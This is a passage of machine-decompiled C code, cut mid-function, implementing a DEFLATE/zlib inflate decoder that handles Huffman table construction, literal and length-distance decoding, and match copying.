							_t843 = _t822 - 1;
							__eflags = _t843;
							if(_t843 == 0) {
								L393:
								 *_t1381 = 0x28;
								goto L395;
							}
							_t844 = _t843 - 1;
							__eflags = _t844;
							if(_t844 == 0) {
								__eflags = _t1243 - _t1336;
								if(_t1243 >= _t1336) {
									L376:
									__eflags = _a24 & 0x00000002;
									if((_a24 & 0x00000002) != 0) {
										_v20 = 1;
										 *_t1381 = 0x29;
										goto L396;
									}
									_t845 = 0;
									__eflags = 0;
									L378:
									_v12 = _v12 | _t845 << _t1091;
									_t1091 = _t1091 + 8;
									__eflags = _t1091;
									L379:
									__eflags = _t1091 - 8;
									if(_t1091 >= 8) {
										_t847 = _v12 & 0x000000ff;
										_v12 = _v12 >> 8;
										_t1091 = _t1091 - 8;
										__eflags = _t1091;
										L383:
										_t720 =  &_v16;
										 *_t720 = _v16 + 1;
										__eflags =  *_t720;
										_t1381[4] = _t1381[4] << 0x00000008 | _t847;
										L384:
										__eflags = _v16 - 4;
										if(_v16 >= 4) {
											L392:
											_v20 = _v20 & 0x00000000;
											 *_t1381 = 0x22;
											goto L396;
										}
										__eflags = _t1091;
										if(_t1091 != 0) {
											goto L379;
										}
										__eflags = _v8 - _t1336;
										if(_v8 < _t1336) {
											_t847 =  *_v8 & 0x000000ff;
											_v8 = _v8 + 1;
											goto L383;
										}
										L387:
										__eflags = _a24 & 0x00000002;
										if((_a24 & 0x00000002) != 0) {
											_v20 = 1;
											 *_t1381 = 0x2a;
											goto L396;
										}
										_t847 = 0;
										goto L383;
									}
									__eflags = _v8 - _t1336;
									if(_v8 >= _t1336) {
										goto L376;
									}
									_t845 =  *_v8 & 0x000000ff;
									_v8 = _v8 + 1;
									goto L378;
								}
								_t845 =  *_t1243 & 0x000000ff;
								_v8 =  &(_t1243[1]);
								goto L378;
							}
							_t850 = _t844 - 1;
							__eflags = _t850;
							if(_t850 == 0) {
								__eflags = _t1243 - _t1336;
								if(_t1243 >= _t1336) {
									goto L387;
								}
								_t847 =  *_t1243 & 0x000000ff;
								_v8 =  &(_t1243[1]);
								goto L383;
							}
							_t851 = _t850 - 9;
							__eflags = _t851;
							if(_t851 == 0) {
								__eflags = _t1243 - _t1336;
								if(_t1243 >= _t1336) {
									L92:
									__eflags = _a24 & 0x00000002;
									if((_a24 & 0x00000002) != 0) {
										_v20 = 1;
										 *_t1381 = 0x33;
										goto L396;
									}
									_t852 = 0;
									__eflags = 0;
									L94:
									_v12 = _v12 | _t852 << _t1091;
									_t1091 = _t1091 + 8;
									__eflags = _t1091;
									L95:
									__eflags = _t1091 - 8;
									if(_t1091 >= 8) {
										_t1119 = _v12 & 0x000000ff;
										_v12 = _v12 >> 8;
										_v40 = _t1119;
										_t1091 = _t1091 - 8;
										__eflags = _t1091;
										L99:
										_t854 = _v28;
										__eflags = _t854 - _v48;
										if(_t854 >= _v48) {
											_v20 = 2;
											 *_t1381 = 0x34;
											goto L396;
										}
										 *_t854 = _t1119;
										_t117 =  &_v16;
										 *_t117 = _v16 - 1;
										__eflags =  *_t117;
										_v28 =  &(_t854[0]);
										L101:
										__eflags = _v16;
										if(_v16 == 0) {
											L113:
											__eflags = _t1381[5] & 0x00000001;
											if((_t1381[5] & 0x00000001) == 0) {
												L121:
												__eflags = _t1091 - 3;
												if(_t1091 < 3) {
													__eflags = _v8 - _v24;
													if(_v8 < _v24) {
														_t858 =  *_v8 & 0x000000ff;
														_t152 =  &_v8;
														 *_t152 = _v8 + 1;
														__eflags =  *_t152;
														L120:
														_v12 = _v12 | _t858 << _t1091;
														_t1091 = _t1091 + 8;
														__eflags = _t1091;
														goto L121;
													}
													L117:
													__eflags = _a24 & 0x00000002;
													if((_a24 & 0x00000002) != 0) {
														_v20 = 1;
														 *_t1381 = 3;
														goto L396;
													}
													_t858 = 0;
													goto L120;
												}
												_v12 = _v12 >> 3;
												_t861 = _v12 & 0x00000007;
												_t1091 = _t1091 - 3;
												_t1381[5] = _t861;
												_t862 = _t861 >> 1;
												__eflags = _t862;
												_v32 = _t1091;
												_t1381[6] = _t862;
												if(_t862 == 0) {
													L322:
													__eflags = _t1091 - (_t1091 & 0x00000007);
													if(_t1091 < (_t1091 & 0x00000007)) {
														__eflags = _v8 - _v24;
														if(_v8 < _v24) {
															_t867 =  *_v8 & 0x000000ff;
															_t622 =  &_v8;
															 *_t622 = _v8 + 1;
															__eflags =  *_t622;
															L321:
															_v12 = _v12 | _t867 << _t1091;
															_t1091 = _t1091 + 8;
															__eflags = _t1091;
															goto L322;
														}
														L318:
														__eflags = _a24 & 0x00000002;
														if((_a24 & 0x00000002) != 0) {
															_v20 = 1;
															 *_t1381 = 5;
															goto L396;
														}
														_t867 = 0;
														goto L321;
													}
													_t1131 = _t1091 & 0x00000007;
													_v12 = _v12 >> _t1131;
													_t1091 = _t1091 - _t1131;
													_t628 =  &_v16;
													 *_t628 = _v16 & 0x00000000;
													__eflags =  *_t628;
													L324:
													__eflags = _v16 - 4;
													if(_v16 >= 4) {
														_t871 = (_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff;
														_v16 = _t871;
														__eflags = _t871 - (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff);
														if(_t871 != (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
															goto L394;
														}
														_t1336 = _v24;
														goto L101;
													}
													__eflags = _t1091;
													if(_t1091 != 0) {
														L334:
														__eflags = _t1091 - 8;
														if(_t1091 < 8) {
															__eflags = _v8 - _v24;
															if(_v8 < _v24) {
																_t884 =  *_v8 & 0x000000ff;
																_t645 =  &_v8;
																 *_t645 = _v8 + 1;
																__eflags =  *_t645;
																L333:
																_v12 = _v12 | _t884 << _t1091;
																_t1091 = _t1091 + 8;
																__eflags = _t1091;
																goto L334;
															}
															L330:
															__eflags = _a24 & 0x00000002;
															if((_a24 & 0x00000002) != 0) {
																_v20 = 1;
																 *_t1381 = 6;
																goto L396;
															}
															_t884 = 0;
															goto L333;
														}
														_v12 = _v12 >> 8;
														 *( &(_t1381[0xa48]) + _v16) = _v12;
														_t1091 = _t1091 - 8;
														L337:
														_v16 = _v16 + 1;
														goto L324;
													}
													__eflags = _v8 - _v24;
													if(_v8 < _v24) {
														_t657 =  &_v8;
														 *_t657 = _v8 + 1;
														__eflags =  *_t657;
														 *( &(_t1381[0xa48]) + _v16) =  *_v8;
														goto L337;
													}
													L327:
													__eflags = _a24 & 0x00000002;
													if((_a24 & 0x00000002) != 0) {
														_v20 = 1;
														 *_t1381 = 7;
														goto L396;
													}
													 *( &(_t1381[0xa48]) + _v16) = 0;
													goto L337;
												}
												__eflags = _t862 - 3;
												if(_t862 == 3) {
													L349:
													 *_t1381 = 0xa;
													goto L395;
												}
												__eflags = _t862 - 1;
												if(_t862 != 1) {
													_t1347 = 0;
													__eflags = 0;
													L127:
													_v16 = _t1347;
													__eflags = _t1347 - 3;
													if(_t1347 >= 3) {
														memset( &(_t1381[0x6e0]), 0, 0x120);
														_t1383 = _t1383 + 0xc;
														_t202 =  &_v16;
														 *_t202 = _v16 & 0x00000000;
														__eflags =  *_t202;
														L137:
														__eflags = _v16 - _t1381[0xd];
														if(_v16 < _t1381[0xd]) {
															L161:
															__eflags = _t1091 - 3;
															if(_t1091 < 3) {
																__eflags = _v8 - _v24;
																if(_v8 < _v24) {
																	_t896 =  *_v8 & 0x000000ff;
																	_t261 =  &_v8;
																	 *_t261 = _v8 + 1;
																	__eflags =  *_t261;
																	L160:
																	_v12 = _v12 | _t896 << _t1091;
																	_t1091 = _t1091 + 8;
																	__eflags = _t1091;
																	goto L161;
																}
																L157:
																__eflags = _a24 & 0x00000002;
																if((_a24 & 0x00000002) != 0) {
																	_v20 = 1;
																	 *_t1381 = 0xe;
																	goto L396;
																}
																_t896 = 0;
																goto L160;
															}
															_t267 = _v16 + 0x3b6620; // 0x121110
															_v12 = _v12 >> 3;
															_t1091 = _t1091 - 3;
															_v16 = _v16 + 1;
															_v32 = _t1091;
															 *((char*)( &(_t1381[0x6e0]) + ( *_t267 & 0x000000ff))) = _v12 & 0x00000007;
															goto L137;
														}
														_t1381[0xd] = 0x13;
														L139:
														_t900 = _t1381[6];
														__eflags = _t900;
														if(_t900 < 0) {
															while(1) {
																L215:
																_t902 = _v24 - _v8;
																__eflags = _t902 - 4;
																if(_t902 < 4) {
																	break;
																}
																__eflags = _v48 - _v28 - 2;
																if(_v48 - _v28 < 2) {
																	break;
																}
																__eflags = _t1091 - 0xf;
																if(_t1091 < 0xf) {
																	_v8 = _v8 + 2;
																	_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
																	_t1091 = _t1091 + 0x10;
																	__eflags = _t1091;
																}
																_t968 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
																__eflags = _t968;
																if(_t968 < 0) {
																	_t1357 = 0xa;
																	do {
																		_t968 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1357 & 0x00000001) +  !_t968) * 2));
																		_t1357 = _t1357 + 1;
																		__eflags = _t968;
																	} while (_t968 < 0);
																	goto L223;
																} else {
																	_t1357 = _t968 >> 9;
																	L223:
																	_v12 = _v12 >> _t1357;
																	_t1091 = _t1091 - _t1357;
																	_v16 = _t968;
																	__eflags = _t968 & 0x00000100;
																	if((_t968 & 0x00000100) != 0) {
																		L256:
																		_v16 = _v16 & 0x000001ff;
																		__eflags = _v16 - 0x100;
																		if(_v16 == 0x100) {
																			goto L113;
																		}
																		_t908 = _v16 * 4 - 0x404;
																		_t482 = _t908 + 0x3b64a0; // 0x0
																		_t1187 =  *_t482;
																		_t483 = _t908 + 0x3b6420; // 0x1
																		_v36 = _t1187;
																		_v16 =  *_t483;
																		__eflags = _t1187;
																		if(_t1187 == 0) {
																			L266:
																			__eflags = _t1091 - 0xf;
																			if(_t1091 >= 0xf) {
																				L282:
																				_t912 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
																				__eflags = _t912;
																				if(_t912 < 0) {
																					_t1358 = 0xa;
																					do {
																						_t912 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1358 & 0x00000001) +  !_t912) * 2));
																						_t1358 = _t1358 + 1;
																						__eflags = _t912;
																					} while (_t912 < 0);
																					L286:
																					_v12 = _v12 >> _t1358;
																					_t1190 =  *(0x3b65a0 + _t912 * 4);
																					_t1091 = _t1091 - _t1358;
																					_v36 = _t1190;
																					_v40 =  *((intOrPtr*)(0x3b6520 + _t912 * 4));
																					__eflags = _t1190;
																					if(_t1190 == 0) {
																						L295:
																						_t1191 = _v28;
																						_t916 = _t1191 - _a12;
																						_v56 = _t916;
																						__eflags = _v40 - _t916;
																						if(_v40 <= _t916) {
																							L297:
																							_t919 = (_t916 - _v40 & _v60) + _a12;
																							__eflags = _t1191 - _t919;
																							if(_t1191 <= _t919) {
																								_t1191 = _t919;
																							}
																							__eflags = _t1191 + _v16 - _v48;
																							if(_t1191 + _v16 <= _v48) {
																								__eflags = _v16 - 9;
																								if(_v16 < 9) {
																									L312:
																									_t1359 = _v28;
																									do {
																										L313:
																										_v16 = _v16 - 3;
																										 *_t1359 =  *_t919;
																										 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
																										 *((char*)(_t1359 + 2)) =  *((intOrPtr*)(_t919 + 2));
																										_t1359 = _t1359 + 3;
																										_t919 = _t919 + 3;
																										__eflags = _v16 - 2;
																									} while (_v16 > 2);
																									__eflags = _v16;
																									_v28 = _t1359;
																									if(_v16 <= 0) {
																										continue;
																									}
																									__eflags = _v16 - 1;
																									 *_t1359 =  *_t919;
																									if(_v16 <= 1) {
																										L311:
																										_v28 = _t1359 + _v16;
																										continue;
																									}
																									L310:
																									 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
																									goto L311;
																								}
																								__eflags = _v16 - _v40;
																								if(_v16 > _v40) {
																									goto L312;
																								}
																								_t1362 = _v28;
																								_t1200 = (_v16 & 0xfffffff8) + _t919;
																								__eflags = _t1200;
																								do {
																									 *_t1362 =  *_t919;
																									 *((intOrPtr*)(_t1362 + 4)) =  *((intOrPtr*)(_t919 + 4));
																									_t919 = _t919 + 8;
																									_t1362 = _t1362 + 8;
																									__eflags = _t919 - _t1200;
																								} while (_t919 < _t1200);
																								_v16 = _v16 & 0x00000007;
																								__eflags = _v16 - 3;
																								_v28 = _t1362;
																								if(_v16 >= 3) {
																									goto L313;
																								}
																								__eflags = _v16;
																								if(_v16 == 0) {
																									continue;
																								}
																								__eflags = _v16 - 1;
																								 *_t1362 =  *_t919;
																								if(_v16 <= 1) {
																									goto L311;
																								}
																								goto L310;
																							} else {
																								L300:
																								_v16 = _v16 - 1;
																								__eflags = _v16;
																								if(_v16 == 0) {
																									continue;
																								}
																								L301:
																								_t922 = _v28;
																								__eflags = _t922 - _v48;
																								if(_t922 >= _v48) {
																									_v20 = 2;
																									 *_t1381 = 0x35;
																									goto L396;
																								}
																								 *_t922 =  *((intOrPtr*)((_v56 - _v40 & _v60) + _a12));
																								_v56 = _v56 + 1;
																								_v28 = _t922 + 1;
																								goto L300;
																							}
																						}
																						__eflags = _a24 & 0x00000004;
																						if((_a24 & 0x00000004) != 0) {
																							L81:
																							 *_t1381 = 0x25;
																							goto L395;
																						}
																						goto L297;
																					}
																					L293:
																					__eflags = _t1091 - _v36;
																					if(_t1091 < _v36) {
																						__eflags = _v8 - _v24;
																						if(_v8 < _v24) {
																							_t926 =  *_v8 & 0x000000ff;
																							_t552 =  &_v8;
																							 *_t552 = _v8 + 1;
																							__eflags =  *_t552;
																							L292:
																							_v12 = _v12 | _t926 << _t1091;
																							_t1091 = _t1091 + 8;
																							__eflags = _t1091;
																							goto L293;
																						}
																						L289:
																						__eflags = _a24 & 0x00000002;
																						if((_a24 & 0x00000002) != 0) {
																							_v20 = 1;
																							 *_t1381 = 0x1b;
																							goto L396;
																						}
																						_t926 = 0;
																						goto L292;
																					}
																					_t1207 = _v36;
																					_t1091 = _t1091 - _t1207;
																					_v12 = _v12 >> _t1207;
																					_t561 =  &_v40;
																					 *_t561 = _v40 + ((1 << _t1207) - 0x00000001 & _v12);
																					__eflags =  *_t561;
																					goto L295;
																				}
																				_t1358 = _t912 >> 9;
																				_t912 = _t912 & 0x000001ff;
																				goto L286;
																			}
																			_t933 = _v8;
																			__eflags = _v24 - _t933 - 2;
																			if(_v24 - _t933 >= 2) {
																				_v8 =  &(_t933[2]);
																				_v12 = _v12 | (_t933[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t933 & 0x000000ff) << _t1091;
																				_t1091 = _t1091 + 0x10;
																				__eflags = _t1091;
																				goto L282;
																			}
																			L268:
																			_t937 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
																			__eflags = _t937;
																			if(_t937 < 0) {
																				_t1212 = 0xa;
																				__eflags = _t1091 - _t1212;
																				if(_t1091 <= _t1212) {
																					L275:
																					__eflags = _v8 - _v24;
																					if(_v8 < _v24) {
																						_t940 =  *_v8 & 0x000000ff;
																						_t521 =  &_v8;
																						 *_t521 = _v8 + 1;
																						__eflags =  *_t521;
																						L279:
																						_t941 = _t940 << _t1091;
																						_t1091 = _t1091 + 8;
																						_v12 = _v12 | _t941;
																						__eflags = _t1091 - 0xf;
																						if(_t1091 < 0xf) {
																							goto L268;
																						}
																						goto L282;
																					}
																					L276:
																					__eflags = _a24 & 0x00000002;
																					if((_a24 & 0x00000002) != 0) {
																						_v20 = 1;
																						 *_t1381 = 0x1a;
																						goto L396;
																					}
																					_t940 = 0;
																					goto L279;
																				} else {
																					goto L273;
																				}
																				while(1) {
																					L273:
																					_t937 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1212 & 0x00000001) +  !_t937) * 2));
																					_t1212 = _t1212 + 1;
																					__eflags = _t937;
																					if(_t937 >= 0) {
																						goto L282;
																					}
																					_t514 = _t1212 + 1; // 0xc
																					__eflags = _t1091 - _t514;
																					if(_t1091 >= _t514) {
																						continue;
																					}
																					goto L275;
																				}
																				goto L282;
																			}
																			_t943 = _t937 >> 9;
																			__eflags = _t943;
																			if(_t943 == 0) {
																				goto L275;
																			}
																			__eflags = _t1091 - _t943;
																			if(_t1091 >= _t943) {
																				goto L282;
																			}
																			goto L275;
																		}
																		__eflags = _t1091 - _t1187;
																		if(_t1091 >= _t1187) {
																			L265:
																			_t1091 = _t1091 - _v36;
																			_v12 = _v12 >> _t1187;
																			_t502 =  &_v16;
																			 *_t502 = _v16 + ((1 << _t1187) - 0x00000001 & _v12);
																			__eflags =  *_t502;
																			goto L266;
																		}
																		L259:
																		__eflags = _v8 - _v24;
																		if(_v8 < _v24) {
																			_t951 =  *_v8 & 0x000000ff;
																			_t492 =  &_v8;
																			 *_t492 = _v8 + 1;
																			__eflags =  *_t492;
																			L263:
																			_t952 = _t951 << _t1091;
																			_t1091 = _t1091 + 8;
																			_v12 = _v12 | _t952;
																			__eflags = _t1091 - _v36;
																			if(_t1091 < _v36) {
																				goto L259;
																			}
																			_t1187 = _v36;
																			goto L265;
																		}
																		L260:
																		__eflags = _a24 & 0x00000002;
																		if((_a24 & 0x00000002) != 0) {
																			_v20 = 1;
																			 *_t1381 = 0x19;
																			goto L396;
																		}
																		_t951 = 0;
																		goto L263;
																	}
																	__eflags = _t1091 - 0xf;
																	if(_t1091 < 0xf) {
																		_v8 = _v8 + 2;
																		_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
																		_t1091 = _t1091 + 0x10;
																		__eflags = _t1091;
																	}
																	_t972 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
																	__eflags = _t972;
																	if(_t972 < 0) {
																		_t1366 = 0xa;
																		do {
																			_t972 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1366 & 0x00000001) +  !_t972) * 2));
																			_t1366 = _t1366 + 1;
																			__eflags = _t972;
																		} while (_t972 < 0);
																		goto L230;
																	} else {
																		_t1366 = _t972 >> 9;
																		L230:
																		_t1297 = _v28;
																		_v12 = _v12 >> _t1366;
																		_t1091 = _t1091 - _t1366;
																		 *_t1297 = _v16;
																		__eflags = _t972 & 0x00000100;
																		if((_t972 & 0x00000100) != 0) {
																			_t473 =  &_v28;
																			 *_t473 = _v28 + 1;
																			__eflags =  *_t473;
																			_v16 = _t972;
																			goto L256;
																		}
																		_v28 = _v28 + 2;
																		 *(_t1297 + 1) = _t972;
																		continue;
																	}
																}
															}
															__eflags = _t1091 - 0xf;
															if(_t1091 >= 0xf) {
																L248:
																_t905 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
																__eflags = _t905;
																if(_t905 < 0) {
																	_t1348 = 0xa;
																	do {
																		_t905 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1348 & 0x00000001) +  !_t905) * 2));
																		_t1348 = _t1348 + 1;
																		__eflags = _t905;
																	} while (_t905 < 0);
																	L252:
																	_v12 = _v12 >> _t1348;
																	_t1091 = _t1091 - _t1348;
																	_v16 = _t905;
																	__eflags = _t905 - 0x100;
																	if(_t905 >= 0x100) {
																		goto L256;
																	}
																	L253:
																	_t953 = _v28;
																	__eflags = _t953 - _v48;
																	if(_t953 >= _v48) {
																		_v20 = 2;
																		 *_t1381 = 0x18;
																		goto L396;
																	}
																	 *_t953 = _v16;
																	_v28 = _t953 + 1;
																	goto L215;
																}
																_t1348 = _t905 >> 9;
																_t905 = _t905 & 0x000001ff;
																goto L252;
															}
															__eflags = _t902 - 2;
															if(_t902 >= 2) {
																_t955 = _v8;
																_v8 =  &(_t955[2]);
																_v12 = _v12 | (_t955[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t955 & 0x000000ff) << _t1091;
																_t1091 = _t1091 + 0x10;
																__eflags = _t1091;
																goto L248;
															}
															L234:
															_t959 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
															__eflags = _t959;
															if(_t959 < 0) {
																_t1144 = 0xa;
																__eflags = _t1091 - _t1144;
																if(_t1091 <= _t1144) {
																	L241:
																	__eflags = _v8 - _v24;
																	if(_v8 < _v24) {
																		_t962 =  *_v8 & 0x000000ff;
																		_t448 =  &_v8;
																		 *_t448 = _v8 + 1;
																		__eflags =  *_t448;
																		L245:
																		_t963 = _t962 << _t1091;
																		_t1091 = _t1091 + 8;
																		_v12 = _v12 | _t963;
																		__eflags = _t1091 - 0xf;
																		if(_t1091 < 0xf) {
																			goto L234;
																		}
																		goto L248;
																	}
																	L242:
																	__eflags = _a24 & 0x00000002;
																	if((_a24 & 0x00000002) != 0) {
																		_v20 = 1;
																		 *_t1381 = 0x17;
																		goto L396;
																	}
																	_t962 = 0;
																	goto L245;
																} else {
																	goto L239;
																}
																while(1) {
																	L239:
																	_t959 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1144 & 0x00000001) +  !_t959) * 2));
																	_t1144 = _t1144 + 1;
																	__eflags = _t959;
																	if(_t959 >= 0) {
																		goto L248;
																	}
																	_t441 = _t1144 + 1; // 0xc
																	__eflags = _t1091 - _t441;
																	if(_t1091 >= _t441) {
																		continue;
																	}
																	goto L241;
																}
																goto L248;
															}
															_t965 = _t959 >> 9;
															__eflags = _t965;
															if(_t965 == 0) {
																goto L241;
															}
															__eflags = _t1091 - _t965;
															if(_t1091 >= _t965) {
																goto L248;
															}
															goto L241;
														}
														_t209 =  &(_t1381[0x10]); // 0x40
														_t1368 = _t209 + _t900 * 0xda0;
														memset( &_v192, 0, 0x40);
														_t211 = _t1368 + 0x120; // 0x160
														memset(_t211, 0, 0x800);
														_t212 = _t1368 + 0x920; // 0x960
														memset(_t212, 0, 0x480);
														_t988 =  *((intOrPtr*)(_t1381 + 0x2c + _t1381[6] * 4));
														_t1383 = _t1383 + 0x24;
														_t1150 = 0;
														_v44 = _t988;
														__eflags = _t988;
														if(_t988 <= 0) {
															L143:
															_t1151 = 0;
															_t1104 = 0;
															__eflags = 0;
															_v124 = 0;
															_v128 = 0;
															_t989 = 4;
															do {
																_t1298 =  *((intOrPtr*)(_t1382 + _t989 - 0xbc));
																_t1151 = _t1151 + _t1298 + _t1151 + _t1298;
																 *((intOrPtr*)(_t1382 + _t989 - 0x78)) = _t1151;
																_t989 = _t989 + 4;
																_t1104 = _t1104 + _t1298;
																__eflags = _t989 - 0x3c;
															} while (_t989 <= 0x3c);
															__eflags = _t1151 - 0x10000;
															if(_t1151 == 0x10000) {
																L147:
																_v20 = _v20 | 0xffffffff;
																_v52 = _v52 & 0x00000000;
																__eflags = _v44;
																_t1091 = _v32;
																if(_v44 <= 0) {
																	L174:
																	__eflags = _t1381[6] - 2;
																	if(_t1381[6] != 2) {
																		L214:
																		_t1381[6] = _t1381[6] - 1;
																		goto L139;
																	}
																	_t300 =  &_v16;
																	 *_t300 = _v16 & 0x00000000;
																	__eflags =  *_t300;
																	L176:
																	__eflags = _v16 - _t1381[0xc] + _t1381[0xb];
																	if(_v16 >= _t1381[0xc] + _t1381[0xb]) {
																		_t992 = _t1381[0xb];
																		__eflags = _t1381[0xc] + _t992 - _v16;
																		if(_t1381[0xc] + _t992 != _v16) {
																			L357:
																			 *_t1381 = 0x15;
																			goto L395;
																		}
																		memcpy( &(_t1381[0x10]),  &(_t1381[0xa49]), _t992);
																		memcpy( &(_t1381[0x378]), _t1381 + _t1381[0xb] + 0x2924, _t1381[0xc]);
																		_t1383 = _t1383 + 0x18;
																		goto L214;
																	}
																	__eflags = _t1091 - 0xf;
																	if(_t1091 >= 0xf) {
																		L193:
																		_t1002 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
																		__eflags = _t1002;
																		if(_t1002 < 0) {
																			_t1369 = 0xa;
																			do {
																				_t1002 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1369 & 0x00000001) +  !_t1002) * 2));
																				_t1369 = _t1369 + 1;
																				__eflags = _t1002;
																			} while (_t1002 < 0);
																			L197:
																			_v12 = _v12 >> _t1369;
																			_t1091 = _t1091 - _t1369;
																			_v40 = _t1002;
																			_v32 = _t1091;
																			__eflags = _t1002 - 0x10;
																			if(__eflags >= 0) {
																				if(__eflags != 0) {
																					L201:
																					_t1157 =  *((char*)(_t1002 + 0x3b6634));
																					_v36 = _t1157;
																					__eflags = _t1091 - _t1157;
																					if(_t1091 >= _t1157) {
																						L208:
																						_t1004 = _v40;
																						_t1091 = _t1091 - _t1157;
																						_v32 = _t1091;
																						_v12 = _v12 >> _t1157;
																						_t1375 = ((1 << _t1157) - 0x00000001 & _v12) +  *((char*)(_t1004 + 0x3b6638));
																						__eflags = _t1004 - 0x10;
																						if(_t1004 != 0x10) {
																							_t1005 = 0;
																							__eflags = 0;
																						} else {
																							_t1005 =  *( &(_t1381[0xa48]) + _v16) & 0x000000ff;
																						}
																						memset( &(_t1381[0xa49]) + _v16, _t1005, _t1375);
																						_t1383 = _t1383 + 0xc;
																						_v16 = _v16 + _t1375;
																						goto L176;
																					}
																					L202:
																					__eflags = _v8 - _v24;
																					if(_v8 < _v24) {
																						_t1012 =  *_v8 & 0x000000ff;
																						_t357 =  &_v8;
																						 *_t357 = _v8 + 1;
																						__eflags =  *_t357;
																						L206:
																						_t1013 = _t1012 << _t1091;
																						_t1091 = _t1091 + 8;
																						_v12 = _v12 | _t1013;
																						__eflags = _t1091 - _v36;
																						if(_t1091 < _v36) {
																							goto L202;
																						}
																						_t1157 = _v36;
																						goto L208;
																					}
																					L203:
																					__eflags = _a24 & 0x00000002;
																					if((_a24 & 0x00000002) != 0) {
																						_v20 = 1;
																						 *_t1381 = 0x12;
																						goto L396;
																					}
																					_t1012 = 0;
																					goto L206;
																				}
																				__eflags = _v16;
																				if(_v16 == 0) {
																					L355:
																					 *_t1381 = 0x11;
																					goto L395;
																				}
																				goto L201;
																			}
																			_v16 = _v16 + 1;
																			 *( &(_t1381[0xa49]) + _v16) = _t1002;
																			goto L176;
																		}
																		_t1369 = _t1002 >> 9;
																		_t1002 = _t1002 & 0x000001ff;
																		goto L197;
																	}
																	_t1014 = _v8;
																	__eflags = _v24 - _t1014 - 2;
																	if(_v24 - _t1014 >= 2) {
																		_t327 = _t1091 + 8; // 0xa
																		_v8 =  &(_t1014[2]);
																		_v12 = _v12 | (_t1014[1] & 0x000000ff) << _t327 | ( *_t1014 & 0x000000ff) << _t1091;
																		_t1091 = _t1091 + 0x10;
																		__eflags = _t1091;
																		goto L193;
																	}
																	L179:
																	_t1018 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
																	__eflags = _t1018;
																	if(_t1018 < 0) {
																		_t1163 = 0xa;
																		__eflags = _t1091 - _t1163;
																		if(_t1091 <= _t1163) {
																			L186:
																			__eflags = _v8 - _v24;
																			if(_v8 < _v24) {
																				_t1021 =  *_v8 & 0x000000ff;
																				_t322 =  &_v8;
																				 *_t322 = _v8 + 1;
																				__eflags =  *_t322;
																				L190:
																				_t1022 = _t1021 << _t1091;
																				_t1091 = _t1091 + 8;
																				_v12 = _v12 | _t1022;
																				__eflags = _t1091 - 0xf;
																				if(_t1091 < 0xf) {
																					goto L179;
																				}
																				goto L193;
																			}
																			L187:
																			__eflags = _a24 & 0x00000002;
																			if((_a24 & 0x00000002) != 0) {
																				_v20 = 1;
																				 *_t1381 = 0x10;
																				goto L396;
																			}
																			_t1021 = 0;
																			goto L190;
																		} else {
																			goto L184;
																		}
																		while(1) {
																			L184:
																			_t1018 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1163 & 0x00000001) +  !_t1018) * 2));
																			_t1163 = _t1163 + 1;
																			__eflags = _t1018;
																			if(_t1018 >= 0) {
																				goto L193;
																			}
																			_t315 = _t1163 + 1; // 0xc
																			__eflags = _t1091 - _t315;
																			if(_t1091 >= _t315) {
																				continue;
																			}
																			goto L186;
																		}
																		goto L193;
																	}
																	_t1024 = _t1018 >> 9;
																	__eflags = _t1024;
																	if(_t1024 == 0) {
																		goto L186;
																	}
																	__eflags = _t1091 - _t1024;
																	if(_t1091 >= _t1024) {
																		goto L193;
																	}
																	goto L186;
																} else {
																	goto L148;
																}
																do {
																	L148:
																	_t1168 =  *(_v52 + _t1368) & 0x000000ff;
																	_t1025 = 0;
																	__eflags = _t1168;
																	if(_t1168 == 0) {
																		goto L173;
																	}
																	_t1312 = _t1382 + _t1168 * 4 - 0x7c;
																	_t1105 =  *_t1312;
																	_v44 = _t1105;
																	 *_t1312 = _t1105 + 1;
																	_t1313 = _t1168;
																	__eflags = _t1168;
																	if(_t1168 == 0) {
																		L151:
																		__eflags = _t1168 - 0xa;
																		if(_t1168 > 0xa) {
																			_t276 = (_t1025 & 0x000003ff) * 2; // 0x160
																			_t1107 = _t1368 + _t276 + 0x120;
																			_t1316 =  *_t1107;
																			__eflags = _t1316;
																			if(_t1316 == 0) {
																				_t1316 = _v20;
																				_t279 =  &_v20;
																				 *_t279 = _v20 - 2;
																				__eflags =  *_t279;
																				 *_t1107 = _t1316;
																			}
																			_t1027 = _t1025 >> 9;
																			__eflags = _t1168 - 0xb;
																			if(_t1168 <= 0xb) {
																				L171:
																				_t1030 = (_t1027 >> 0x00000001 & 0x00000001) - _t1316;
																				__eflags = _t1030;
																				 *((short*)(_t1368 + 0x91e + _t1030 * 2)) = _v52;
																				L172:
																				_t1091 = _v32;
																				goto L173;
																			} else {
																				_t1108 = _t1168 - 0xb;
																				do {
																					_t1027 = _t1027 >> 1;
																					_t1175 = _t1368 + (0x48f - _t1316 - (_t1027 & 0x00000001)) * 2;
																					_t1318 =  *0x48f & 0x0000ffff;
																					__eflags = _t1318;
																					if(_t1318 != 0) {
																						_t1316 = _t1318;
